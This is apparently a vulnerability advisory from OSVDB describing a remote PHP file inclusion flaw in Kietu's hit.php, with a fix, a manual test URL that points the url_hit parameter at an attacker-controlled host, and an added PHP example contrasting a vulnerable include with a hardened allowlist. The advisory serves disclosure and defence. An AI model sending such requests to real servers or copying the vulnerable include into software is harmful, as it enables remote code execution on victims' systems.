Kietu hit.php Arbitrary Code Execution

2003-02-17T05:36:43
ID OSVDB:3777
Type osvdb
Reporter OSVDB
Modified 2003-02-17T05:36:43

Description

Vulnerability Description

Kietu web statistics program contains a flaw that may allow a malicious user to include malicious PHP files from other locations. The issue is triggered when an attacker sends a specially-crafted URL request to the hit.php script with the parameter url_hit set to specify a malicious file. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality, integrity, and/or availability.

Technical Description

When requesting a page using the parameter url_hit and specifying a location by URL it is possible to include a PHP file from a remote location.

Solution Description

Upgrade to version 2.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable allow_url_fopen and register_globals in PHP unless required by other scripts.

Short Description

Kietu web statistics program contains a flaw that may allow a malicious user to include malicious PHP files from other locations. The issue is triggered when an attacker sends a specially-crafted URL request to the hit.php script with the parameter url_hit set to specify a malicious file. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

Example: http://victim.webserver/hit.php?url_hit=http://attacker.webserver/

When this URL request is sent to a vulnerable server it will allow the attacker to run commands specified in a file on his own server: http://attacker.webserver/config.php
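The include pattern described in the Technical Description and the workaround from the Solution Description, shown side by side as an added illustration. This is not Kietu's own code: the vulnerable function is a hypothetical reconstruction of the hit.php behaviour the advisory describes, and the hardened function, its allowlist and the base directory parameter are assumptions made for the example.

```php
<?php
// Added example, not Kietu's code: a hypothetical hit.php-style handler
// reproducing the register_globals + remote include pattern, next to a
// hardened version of the same step.

// --- Vulnerable pattern (hypothetical reconstruction) ---
// With register_globals=On the query parameter ?url_hit=... silently becomes
// the variable $url_hit. With allow_url_fopen=On, include() will then fetch
// and execute http://attacker.webserver/config.php as PHP code.
function vulnerable_hit($url_hit)
{
    include($url_hit . 'config.php');
}

// --- Hardened version ---
// 1. Read the parameter explicitly from $_GET; never rely on register_globals.
// 2. Never hand request data to include(); map it onto a fixed allowlist of
//    local files so no URL or path fragment ever reaches the include.
// 3. In php.ini keep register_globals = Off and allow_url_fopen = Off (and
//    allow_url_include = Off on PHP versions that have it) as defence in depth.
function hardened_hit(array $get, string $base_dir): string
{
    $allowed = [
        'default' => 'config.php',       // assumed local config names
        'alt'     => 'config_alt.php',
    ];
    $key = $get['url_hit'] ?? 'default';
    if (!array_key_exists($key, $allowed)) {
        http_response_code(400);
        return 'invalid url_hit';        // unknown key: nothing is included
    }
    $path = $base_dir . DIRECTORY_SEPARATOR . $allowed[$key];
    require $path;                       // always a fixed local file
    return $path;
}

// Usage: hardened_hit($_GET, __DIR__);
```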

References:

Vendor URL: http://www.kietu.net/
Secunia Advisory ID: 8071
Bugtraq ID: 6863